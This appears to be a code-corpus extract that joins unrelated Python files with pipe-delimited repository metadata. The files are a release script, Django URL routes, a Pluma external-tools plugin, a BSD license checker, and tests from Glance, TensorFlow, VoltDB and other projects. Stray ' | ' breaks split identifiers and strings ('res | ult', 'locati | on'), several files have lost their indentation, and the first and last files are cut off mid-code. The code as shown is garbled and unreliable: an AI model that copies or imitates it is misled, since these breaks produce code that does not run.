        subprocess.run(["git", "push", "--follow-tags"], check=True)
    # upload to pypi
    if ask_confirm("Publish on Pypi?"):
        subprocess.run(["rm", "-rf", "dist"], check=True)
        subprocess.run(["poetry", "build"], check=True)
        subprocess.run(["poetry", "publish"], check=True)
    # create github release
    if ask_confirm("Create github release?"):
        # "Benutzer" is German for "user"; credentials are read interactively.
        response = requests.post(
            f"{GITHUB_API_ENDPOINT}/releases",
            auth=(input("Benutzer: "), getpass.getpass(prompt="API token: ")),
            json={
                "tag_name": f"v{version}",
                "target_commitish": "main",
                "name": f"v{version}",
                "body": changes,
                "draft": False,
                "prerelease": False,
            },
        )
        response.raise_for_status()
    print("Success.")
def main():
    """Command-line entry point: dispatch to the ``version`` or
    ``publish`` sub-command."""
    # The release helpers use paths relative to the repo root, so the
    # script must be invoked from there.
    assert CURRENT_FOLDER == Path.cwd().resolve()
    parser = argparse.ArgumentParser()
    subparsers = parser.add_subparsers()
    parser_version = subparsers.add_parser("version", help="Set the version number")
    parser_version.add_argument(
        "version", type=str, help="The version number", nargs="?", default=None
    )
    parser_version.set_defaults(func=set_version)
    parser_publish = subparsers.add_parser("publish", help="Publish the project")
    parser_publish.set_defaults(func=publish)
    args = parser.parse_args()
    # Without a sub-command the namespace is empty (no defaults were set),
    # so show usage instead of crashing on args.func.
    if not vars(args):
        parser.print_help()
    else:
        args.func(args)
if __name__ == "__main__":
main()
|
Crowdcomputer/CC | general/urls.py | Python | apache-2.0 | 853 | 0.007034 | from django.conf.urls import patterns, url
from django.views.generic.base import TemplateView
from general import views
urlpatterns = patterns('',
url(r'^geoloc/updateloc/$', views.UpdateLoc, name='updateloc'),
url(r'^geoloc/$', views.GeoLoc | , name='geoloc'),
url(r'^geoloc/more$', views.AddGeoLoc, | name='addgeoloc'),
url(r'^create/$', views.CreateUser, name='register'),
url(r'^profile/$', views.ProfileView, name='profile'),
url(r'^login/$', views.Login, name='login'),
url(r'^apilogin/$', views.ApiLogin, name='apilogin'),
url(r'^logout/$', views.Logout, name='logout'),
url(r'^thanks/$', TemplateView.as_view(template_name='general/thanks.html'), name='thanks'),
# url(r'^$',redirect_to, {'url':reverse_lazy('e-list')}),
url(r'^$', TemplateView.as_view(template_name="general/home.html"), name='home'),
)
|
mate-desktop/pluma | plugins/externaltools/tools/functions.py | Python | gpl-2.0 | 10,724 | 0.004476 | # -*- coding: utf-8 -*-
# Pluma External Tools plugin
# Copyright (C) 2005-2006 Steve Frécinaux <steve@istique.net>
# Copyright (C) 2012-2021 MATE Developers
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
from gi.repository import Gio, Gdk, Gtk, GtkSource, Pluma
from .outputpanel import OutputPanel
from .capture import *
def default(val, d):
    """Return *val*, falling back to *d* only when *val* is None.

    Note that falsy values such as 0, '' or False are returned as-is;
    the fallback is used exclusively for None.
    """
    return d if val is None else val
def current_word(document):
    """Return a (start, end) pair of text iters spanning the word at the cursor.

    If the insertion point touches a word, the pair covers that whole word;
    otherwise both iters stay at the cursor position (an empty range).
    """
    end = document.get_iter_at_mark(document.get_insert())
    start = end.copy()
    # Walk the start iter back to the word boundary, unless the cursor is
    # already positioned exactly at a word start.
    touches_word = end.inside_word() or end.ends_word()
    if touches_word and not end.starts_word():
        start.backward_word_start()
    # Extend the end iter forward when the cursor is strictly inside a word.
    if end.inside_word() and not end.ends_word():
        end.forward_word_end()
    return (start, end)
# ==== Capture related functions ====
def run_external_tool(window, panel, node):
# Configure capture environment
try:
cwd = os.getcwd()
except OSError:
cwd = os.getenv('HOME');
capture = Capture(node.command, cwd)
capture.env = os.environ.copy()
capture.set_env(PLUMA_CWD = cwd)
view = window.get_active_view()
if view is not None:
# Environment vars relative to current document
document = view.get_buffer()
uri = document.get_uri()
# Current line number
piter = document.get_iter_at_mark(document.get_insert())
capture.set_env(PLUMA_CURRENT_LINE_NUMBER=str(piter.get_line() + 1))
# Current line text
piter.set_line_offset(0)
end = piter.copy()
if not end.ends_line():
end.forward_to_line_end()
capture.set_env(PLUMA_CURRENT_LINE=piter.get_text(end))
# Selected text (only if input is not selection)
if node.input != 'selection' and node.input != 'selection-document':
bounds = document.get_selection_bounds()
if bounds:
capture.set_env(PLUMA_SELECTED_TEXT=bounds[0].get_text(bounds[1]))
bounds = current_word(document)
capture.set_env(PLUMA_CURRENT_WORD=bounds[0].get_text(bounds[1]))
capture.set_env(PLUMA_CURRENT_DOCUMENT_TYPE=document.get_mime_type())
if uri is not None:
gfile = Gio.file_new_for_uri(uri)
scheme = gfile.get_uri_scheme()
name = os.path.basename(uri)
capture.set_env(PLUMA_CURRENT_DOCUMENT_URI = uri,
PLUMA_CURRENT_DOCUMENT_NAME = name,
PLUMA_CURRENT_DOCUMENT_SCHEME = scheme)
if Pluma.utils_uri_has_file_scheme(uri):
path = gfile.get_path()
cwd = os.path.dirname(path)
capture.set_cwd(cwd)
capture.set_env(PLUMA_CURRENT_DOCUMENT_PATH = path,
PLUMA_CURRENT_DOCUMENT_DIR = cwd)
documents_uri = [doc.get_uri()
for doc in window.get_documents()
if doc.get_uri() is not None]
documents_path = [Gio.file_new_for_uri(uri).get_path()
for uri in documents_uri
if Pluma.utils_uri_has_file_scheme(uri)]
capture.set_env(PLUMA_DOCUMENTS_URI = ' '.join(document | s_uri),
PLUMA_DOCUMENTS_PATH = ' '.join(documents_path))
flags = capture.CAPTURE_BOTH
if not node.has_hash_bang():
flags |= capture.CAPTURE_NEEDS_SHELL
capture.set_flags(flags)
# Get input text
input_type = node.input
output_type = node.output
# Clear the panel
panel.clear()
if output_type == 'output-panel':
panel.show()
# Assign the error output to | the output panel
panel.set_process(capture)
if input_type != 'nothing' and view is not None:
if input_type == 'document':
start, end = document.get_bounds()
elif input_type == 'selection' or input_type == 'selection-document':
try:
start, end = document.get_selection_bounds()
except ValueError:
if input_type == 'selection-document':
start, end = document.get_bounds()
if output_type == 'replace-selection':
document.select_range(start, end)
else:
start = document.get_iter_at_mark(document.get_insert())
end = start.copy()
elif input_type == 'line':
start = document.get_iter_at_mark(document.get_insert())
end = start.copy()
if not start.starts_line():
start.set_line_offset(0)
if not end.ends_line():
end.forward_to_line_end()
elif input_type == 'word':
start = document.get_iter_at_mark(document.get_insert())
end = start.copy()
if not start.inside_word():
panel.write(_('You must be inside a word to run this command'),
panel.command_tag)
return
if not start.starts_word():
start.backward_word_start()
if not end.ends_word():
end.forward_word_end()
input_text = document.get_text(start, end, False)
capture.set_input(input_text)
# Assign the standard output to the chosen "file"
if output_type == 'new-document':
tab = window.create_tab(True)
view = tab.get_view()
document = tab.get_document()
pos = document.get_start_iter()
capture.connect('stdout-line', capture_stdout_line_document, document, pos)
document.begin_user_action()
view.set_editable(False)
view.set_cursor_visible(False)
elif output_type != 'output-panel' and output_type != 'nothing' and view is not None:
document.begin_user_action()
view.set_editable(False)
view.set_cursor_visible(False)
if output_type == 'insert':
pos = document.get_iter_at_mark(document.get_mark('insert'))
elif output_type == 'replace-selection':
document.delete_selection(False, False)
pos = document.get_iter_at_mark(document.get_mark('insert'))
elif output_type == 'replace-document':
document.set_text('')
pos = document.get_end_iter()
else:
pos = document.get_end_iter()
capture.connect('stdout-line', capture_stdout_line_document, document, pos)
elif output_type != 'nothing':
capture.connect('stdout-line', capture_stdout_line_panel, panel)
document.begin_user_action()
capture.connect('stderr-line', capture_stderr_line_panel, panel)
capture.connect('begin-execute', capture_begin_execute_panel, panel, view, node.name)
capture.connect('end-execute', capture_end_execute_panel, panel, view, output_type)
# Run the command
capture.execute()
if output_type != 'nothing':
document.end_user_action()
class MultipleDocumentsSaver:
def __init__(self, window, panel, docs, node):
self._window = window
self._panel = panel
self._node = node
self._error = False
self._counter = len(docs)
self._signal_ids = {}
self._counter = 0
signals = {}
for doc in docs:
signals[doc] = doc.connect('saving', self.on_document_saving)
Pluma.commands_save_document(window, doc)
do |
drmateo/ecto | test/compile/check_new_bsd_license.py | Python | bsd-3-clause | 2,820 | 0.003546 | #!/usr/bin/env python
import sys
bsd = '''
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Willow Garage, Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
skip_check_tag = "Willow Garage BSD License not applicable"
nerrors = 0
import os
autofix = False
if "ECTO_LICENSE_AUTOFIX" in os.environ:
autofix = True
files = sys.argv[1:]
commentchars = { '.cpp' : '//',
'.hpp' : '//',
'.py' : '#',
'.cmake' : '#',
'.txt' : '#'
}
for filename in files:
txt = open(filename).read()
thiserror = False
result = filename + "..."
if skip_check_tag in txt:
result += "ok"
else:
for l in bsd.split('\n'):
if l not in txt:
result += "missing: " + l + "\n"
thiserror = True
if thiserror:
nerrors += 1
else:
res | ult += "ok"
if thiserror and autofix:
newf = open(filename, "w")
for k, v in commentchars.iteritems():
if filename.endswith(k):
cmt = v
if txt.startswith('#!'):
hashbang, rest = txt.split('\n', 1)
print >>newf, hashbang
else:
| rest = txt
print >>newf, cmt, bsd.replace('\n', '\n' + cmt + ' ')
print >>newf, rest
newf.close()
result += filename + "AUTOFIXED"
print result
sys.exit(nerrors)
|
rajalokan/glance | glance/tests/unit/common/scripts/test_scripts_utils.py | Python | apache-2.0 | 5,341 | 0 | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from six.moves import urllib
from glance.common import exception
from glance.common.scripts import utils as script_utils
import glance.tests.utils as test_utils
class TestScriptsUtils(test_utils.BaseTestCase):
def setUp(self):
super(TestScriptsUtils, self).setUp()
def test_get_task(self):
task = mock.ANY
task_repo = mock.Mock(return_value=task)
task_id = mock.ANY
self.assertEqual(task, script_utils.get_task(task_repo, task_id))
def test_unpack_task_input(self):
task_input = {"import_from": "foo",
"import_from_format": "bar",
"image_properties": "baz"}
task = mock.Mock(task_input=task_input)
self.assertEqual(task_input,
script_utils.unpack_task_input(task))
def test_unpack_task_input_error(self):
task_input1 = {"import_from_format": "bar", "image_properties": "baz"}
task_input2 = {"import_from": "foo", "image_properties": "baz"}
task_input3 = {"import_from": "foo", "import_from_format": "bar"}
task1 = mock.Mock(task_input=task_input1)
task2 = mock.Mock(task_input=task_input2)
task3 = mock.Mock(task_input=task_input3)
self.assertRaises(exception.Invalid,
script_utils.unpack_task_input, task1)
self.assertRaises(exception.Invalid,
script_utils.unpack_task_input, task2)
self.assertRaises(exception.Invalid,
script_utils.unpack_task_input, task3)
def test_set_base_image_properties(self):
properties = {}
script_utils.set_base_image_properties(properties)
self.assertIn('disk_format', properties)
self.assertIn('container_format', properties)
self.assertEqual('qcow2', properties['disk_format'])
self.assertEqual('bare', properties['container_format'])
def test_set_base_image_properties_none(self):
properties = None
script_utils.set_base_image_properties(properties)
self.assertIsNone(properties)
def test_set_base_image_properties_not_empty(self):
properties = {'disk_format': 'vmdk', 'container_format': 'bare'}
script_utils.set_base_image_properties(properties)
self.assertIn('disk_format', properties)
self.assertIn('container_format', properties)
self.assertEqual('vmdk', properties.get('disk_format'))
self.assertEqual('bare', properties.get('container_format'))
def test_validate_location_http(self):
location = 'http://example.com'
self.assertEqual(location,
script_utils.validate_location_uri(location))
def test_validate_location_https(self):
location = 'https://example.com'
self.assertEqual(location,
| script_utils.validate_location_uri(locati | on))
def test_validate_location_none_error(self):
self.assertRaises(exception.BadStoreUri,
script_utils.validate_location_uri, '')
def test_validate_location_file_location_error(self):
self.assertRaises(exception.BadStoreUri,
script_utils.validate_location_uri, "file:///tmp")
self.assertRaises(exception.BadStoreUri,
script_utils.validate_location_uri,
"filesystem:///tmp")
def test_validate_location_unsupported_error(self):
location = 'swift'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'swift+http'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'swift+https'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'swift+config'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'vsphere'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'sheepdog://'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'rbd://'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'cinder://'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
|
AbdealiJK/file-metadata | file_metadata/video/ogv_file.py | Python | mit | 683 | 0 | # -*- coding: utf-8 -*-
from __future__ import (division, absolute_import, unicode_literals,
print_function)
from file_metadata.video.video_file import VideoFile
class OGVFile(VideoFile):
@classmethod
def create(cls, *args, **kwargs):
return cls(*args, **k | wargs)
def analyze_file_format(self):
"""
Simply add a metadata mentioning this is a valid OGV file. This is
useful because OGV cannot be simply detected by MimeType as it shares
the same mime with OGG.
:return: dict with the keys:
| - Composite:FileFormat - 'ogv'
"""
return {'Composite:FileFormat': 'ogv'}
|
ZeitOnline/zeit.newsletter | src/zeit/newsletter/browser/edit.py | Python | bsd-3-clause | 2,579 | 0 | from zeit.cms.i18n import MessageFactory as _
from zope.cachedescriptors.property import Lazy as cachedproperty
import os.path
import zeit.cms.browser.view
import zeit.cms.content.interfaces
import zeit.cms.interfaces
import zeit.content.image.interfaces
import zeit.content.video.interfaces
import zeit.edit.browser.form
import zeit.edit.browser.landing
import zeit.edit.browser.view
import zeit.newsletter.interfaces
import zope.formlib.form
class LandingZoneBase(zeit.edit.browser.landing.LandingZone):
    """Common base for landing zones that create a teaser block from a
    dropped content object (identified by its unique id)."""

    uniqueId = zeit.edit.browser.view.Form('uniqueId')
    block_type = 'teaser'

    def initialize_block(self):
        # Resolve the dropped object's unique id to a CMS content object
        # and reference it from the freshly created teaser block.
        self.block.reference = zeit.cms.interfaces.ICMSContent(self.uniqueId)
class GroupLandingZone(LandingZoneBase):
    """Handler to drop objects to the body's landing zone."""

    # Position 0: insert the new block at the very beginning.
    order = 0
class TeaserLandingZone(LandingZoneBase):
    """Handler to drop objects after other objects."""

    # Insert the new block right after the block the drop occurred on.
    order = 'after-context'
class Teaser(zeit.cms.browser.view.Base):
@cachedproperty
def metadata(self):
return zeit.cms.content.interfaces.ICommonMetadata(
self.context.reference, None)
@cachedproperty
def image(self):
# XXX copy&paste&tweak of zeit.content.cp.browser.blocks.teaser.Display
content = self.context.reference
if content is None:
return
if zeit.content.video.interfaces.IVideoContent.providedBy(content):
return | content.thumbnail
images = zeit.content.image.interfaces.IImages(content, None)
if images is None:
preview = zope.component.queryMultiAdapter(
(content, self.request), name='preview')
if preview:
| return self.url(preview)
return
if not images.image:
return
group = images.image
for name in group:
basename, ext = os.path.splitext(name)
if basename.endswith('148x84'):
image = group[name]
return self.url(image, '@@raw')
class Advertisement(zeit.cms.browser.view.Base):
    """View helper exposing the raw image URL of an advertisement block."""

    @cachedproperty
    def image(self):
        """Absolute '@@raw' URL of the block's image, or None when unset."""
        block_image = self.context.image
        if not block_image:
            return None
        return self.url(block_image, '@@raw')
class GroupTitle(zeit.edit.browser.form.InlineForm):
    """Inline edit form for a newsletter group's title."""

    legend = None  # no fieldset legend; the form renders bare
    prefix = 'group'
    undo_description = _('edit group title')
    # Edit only the 'title' field of the IGroup schema.
    form_fields = zope.formlib.form.FormFields(
        zeit.newsletter.interfaces.IGroup).select('title')
class Empty(object):
    """Placeholder view that renders nothing."""

    def render(self):
        # Deliberately produce an empty (unicode) string.
        return u''
|
bw4sz/DeepMeerkat | training/Detection/object_detection/trainer_test.py | Python | gpl-3.0 | 6,550 | 0.00229 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for object_detection.trainer."""
import tensorflow as tf
from google.protobuf import text_format
from object_detection import trainer
from object_detection.core import losses
from object_detection.core import model
from object_detection.core import standard_fields as fields
from object_detection.protos import train_pb2
NUMBER_OF_CLASSES = 2
def get_input_function():
"""A function to get test in | puts. Returns an image with one box."""
image = tf.random_uniform([32, 32, 3], dtype=tf.float32)
class_label = tf.random_uniform(
[1], minval=0, maxval=NUMBER_OF_CLASSES, dtype=tf | .int32)
box_label = tf.random_uniform(
[1, 4], minval=0.4, maxval=0.6, dtype=tf.float32)
return {
fields.InputDataFields.image: image,
fields.InputDataFields.groundtruth_classes: class_label,
fields.InputDataFields.groundtruth_boxes: box_label
}
class FakeDetectionModel(model.DetectionModel):
  """A simple (and poor) DetectionModel for use in test."""

  def __init__(self):
    # Fixed two-class model; NUMBER_OF_CLASSES is the module-level constant.
    super(FakeDetectionModel, self).__init__(num_classes=NUMBER_OF_CLASSES)
    # Anchorwise outputs: the losses yield per-anchor tensors, which are
    # reduced to scalars in loss() below.
    self._classification_loss = losses.WeightedSigmoidClassificationLoss(
        anchorwise_output=True)
    self._localization_loss = losses.WeightedSmoothL1LocalizationLoss(
        anchorwise_output=True)

  def preprocess(self, inputs):
    """Input preprocessing, resizes images to 28x28.

    Args:
      inputs: a [batch, height_in, width_in, channels] float32 tensor
        representing a batch of images with values between 0 and 255.0.

    Returns:
      preprocessed_inputs: a [batch, 28, 28, channels] float32 tensor.
    """
    return tf.image.resize_images(inputs, [28, 28])

  def predict(self, preprocessed_inputs):
    """Prediction tensors from inputs tensor.

    Args:
      preprocessed_inputs: a [batch, 28, 28, channels] float32 tensor.

    Returns:
      prediction_dict: a dictionary holding prediction tensors to be
        passed to the Loss or Postprocess functions.
    """
    # A single fully connected layer per head over the flattened image:
    # one anchor per image, hence the [-1, 1, ...] reshapes below.
    flattened_inputs = tf.contrib.layers.flatten(preprocessed_inputs)
    class_prediction = tf.contrib.layers.fully_connected(
        flattened_inputs, self._num_classes)
    box_prediction = tf.contrib.layers.fully_connected(flattened_inputs, 4)
    return {
        'class_predictions_with_background': tf.reshape(
            class_prediction, [-1, 1, self._num_classes]),
        'box_encodings': tf.reshape(box_prediction, [-1, 1, 4])
    }

  def postprocess(self, prediction_dict, **params):
    """Convert predicted output tensors to final detections. Unused.

    Args:
      prediction_dict: a dictionary holding prediction tensors.
      **params: Additional keyword arguments for specific implementations of
        DetectionModel.

    Returns:
      detections: a dictionary with empty fields.
    """
    return {
        'detection_boxes': None,
        'detection_scores': None,
        'detection_classes': None,
        'num_detections': None
    }

  def loss(self, prediction_dict):
    """Compute scalar loss tensors with respect to provided groundtruth.

    Calling this function requires that groundtruth tensors have been
    provided via the provide_groundtruth function.

    Args:
      prediction_dict: a dictionary holding predicted tensors

    Returns:
      a dictionary mapping strings (loss names) to scalar tensors representing
      loss values.
    """
    batch_reg_targets = tf.stack(
        self.groundtruth_lists(fields.BoxListFields.boxes))
    batch_cls_targets = tf.stack(
        self.groundtruth_lists(fields.BoxListFields.classes))
    # Uniform weight of 1.0 per (example, anchor); shape [batch, 1].
    weights = tf.constant(
        1.0, dtype=tf.float32,
        shape=[len(self.groundtruth_lists(fields.BoxListFields.boxes)), 1])
    location_losses = self._localization_loss(
        prediction_dict['box_encodings'], batch_reg_targets,
        weights=weights)
    cls_losses = self._classification_loss(
        prediction_dict['class_predictions_with_background'], batch_cls_targets,
        weights=weights)
    # Reduce the anchorwise losses to the scalars expected by the trainer.
    loss_dict = {
        'localization_loss': tf.reduce_sum(location_losses),
        'classification_loss': tf.reduce_sum(cls_losses),
    }
    return loss_dict

  def restore_map(self, from_detection_checkpoint=True):
    """Returns a map of variables to load from a foreign checkpoint.

    Args:
      from_detection_checkpoint: whether to restore from a full detection
        checkpoint (with compatible variable names) or to restore from a
        classification checkpoint for initialization prior to training.

    Returns:
      A dict mapping variable names to variables.
    """
    # NOTE(review): the flag is ignored here — every global variable is
    # restored under its own name regardless of checkpoint type.
    return {var.op.name: var for var in tf.global_variables()}
class TrainerTest(tf.test.TestCase):

  def test_configure_trainer_and_train_two_steps(self):
    """Smoke test: parse a minimal train config and run two training steps."""
    # Text-format TrainConfig: constant-LR Adam, two augmentation options,
    # and num_steps limiting the run to 2 iterations.
    train_config_text_proto = """
    optimizer {
      adam_optimizer {
        learning_rate {
          constant_learning_rate {
            learning_rate: 0.01
          }
        }
      }
    }
    data_augmentation_options {
      random_adjust_brightness {
        max_delta: 0.2
      }
    }
    data_augmentation_options {
      random_adjust_contrast {
        min_delta: 0.7
        max_delta: 1.1
      }
    }
    num_steps: 2
    """
    train_config = train_pb2.TrainConfig()
    text_format.Merge(train_config_text_proto, train_config)
    train_dir = self.get_temp_dir()
    # Single-machine, single-clone CPU training using the fake model and
    # random input function defined above; passes if no exception is raised.
    trainer.train(create_tensor_dict_fn=get_input_function,
                  create_model_fn=FakeDetectionModel,
                  train_config=train_config,
                  master='',
                  task=0,
                  num_clones=1,
                  worker_replicas=1,
                  clone_on_cpu=True,
                  ps_tasks=0,
                  worker_job_name='worker',
                  is_chief=True,
                  train_dir=train_dir)
if __name__ == '__main__':
tf.test.main()
|
paulmartel/voltdb | lib/python/vdm/tests/server/deployment_user_test.py | Python | agpl-3.0 | 12,365 | 0.003316 | # This file is part of VoltDB.
# Copyright (C) 2008-2016 VoltDB Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
import unittest
import requests
import socket
import xmlrunner
__host_name__ = socket.gethostname()
__host_or_ip__ = socket.gethostbyname(__host_name__)
__db_url__ = 'http://%s:8000/api/1.0/databases/' % \
__host_or_ip__
class DeploymentUser(unittest.TestCase):
    """
    Integration-test base: creates a database plus one deployment user
    before each test and removes both afterwards.

    NOTE(review): requires a live VDM server reachable at the module-level
    ``__db_url__`` (port 8000 on this host) — these are not unit tests.
    """

    def setUp(self):
        """Create a deployment user"""
        headers = {'Content-Type': 'application/json; charset=utf-8'}
        db_data = {'name': 'testDB'}
        # Create the test database first ...
        response = requests.post(__db_url__, json=db_data, headers=headers)
        self.assertEqual(response.status_code, 201)
        response = requests.get(__db_url__)
        value = response.json()
        if value:
            # ... then attach a user to the most recently listed database.
            db_length = len(value['databases'])
            last_db_id = value['databases'][db_length-1]['id']
            db_data = {"name": "test", "password": "voltdb", "plaintext": True, "roles": "Administrator,Test", "databaseid": 1}
            db_url = '%s%u/users/' % (__db_url__, last_db_id)
            response = requests.post(db_url, json=db_data, headers=headers)
            self.assertEqual(response.status_code, 200)

    def tearDown(self):
        """Delete a deployment user"""
        response = requests.get(__db_url__)
        value = response.json()
        if value:
            db_length = len(value['databases'])
            last_db_id = value['databases'][db_length-1]['id']
            user_url = '%s%u/users/' % (__db_url__, last_db_id)
            response = requests.get(user_url)
            value = response.json()
            if value:
                # Delete the last listed user, then the database itself.
                user_length = len(value['deployment'])
                last_user_id = value['deployment'][user_length-1]['userid']
                user_delete_url = '%s%u/users/%u/' % (__db_url__, last_db_id, last_user_id)
                response = requests.delete(user_delete_url)
                self.assertEqual(response.status_code, 200)
                db_url = __db_url__ + str(last_db_id)
                response = requests.delete(db_url)
                self.assertEqual(response.status_code, 204)
class UpdateDeploymentUser(DeploymentUser):
def test_validate_duplicate_username(self):
"""Validate duplicate username"""
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
db_data = {"name": "test", "password": "voltdb", "plaintext": True, "roles": "Admi | nistrator", "databaseid": 1}
response = requests.post(user_url, json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'], u'user name already exists')
self.assertE | qual(response.status_code, 404)
else:
print "The database list is empty"
def test_validate_username_empty(self):
"""ensure username value is not empty"""
db_data = {"password": "voltdb", "plaintext": True, "roles": "Administrator", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "'name' is a required property")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_validate_invalid_username(self):
db_data = {"name":"@@@@", "password": "voltdb", "plaintext": True, "roles": "Administrator", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "u'@@@@' does not match '^[a-zA-Z0-9_.]+$'")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_validate_password_empty(self):
"""ensure password value is not empty"""
db_data = {"name": "voltdb", "plaintext": True, "roles": "Administrator", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "'password' is a required property")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_validate_roles_empty(self):
"""ensure roles value is not empty"""
db_data = {"name": "voltdb", "password": "test", "plaintext": True, "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "'roles' is a required property")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_validate_invalid_role(self):
db_data = {"name": "voltdb", "password": "test", "plaintext": True,"roles":"@@@@", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "u'@@@@' does not match '^[a-zA-Z0-9_.,-]+$'")
self.assertEqual(response.status_code, 200)
db_data = {"name": "voltdb", "password": "test", "plaintext": True,"roles":",", "databaseid": 1}
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'], "Invalid user roles.")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_ensure_no_duplicate_role(self):
"""ensure no duplicate roles are inserted"""
db_data = {"name": "test", "password": "admin", "plaintext": True, "roles": "Test1,Test1", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.get(user_url)
value = response.json()
if value:
|
homeworkprod/byceps | tests/integration/blueprints/admin/orga_team/test_team_views.py | Python | bsd-3-clause | 4,119 | 0.000243 | """
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from byceps.services.orga_team import service as orga_team_service
from byceps.services.party import service as party_service
from tests.helpers import create_party
def test_tea | ms_for_party(orga_team_admin_client, party):
url = f'/admin/orga_teams/teams/{party.id}'
response = orga_team_admin_client.get(url)
assert response.status_code == 200
def test_team_create_form(orga_team_admin_client, party):
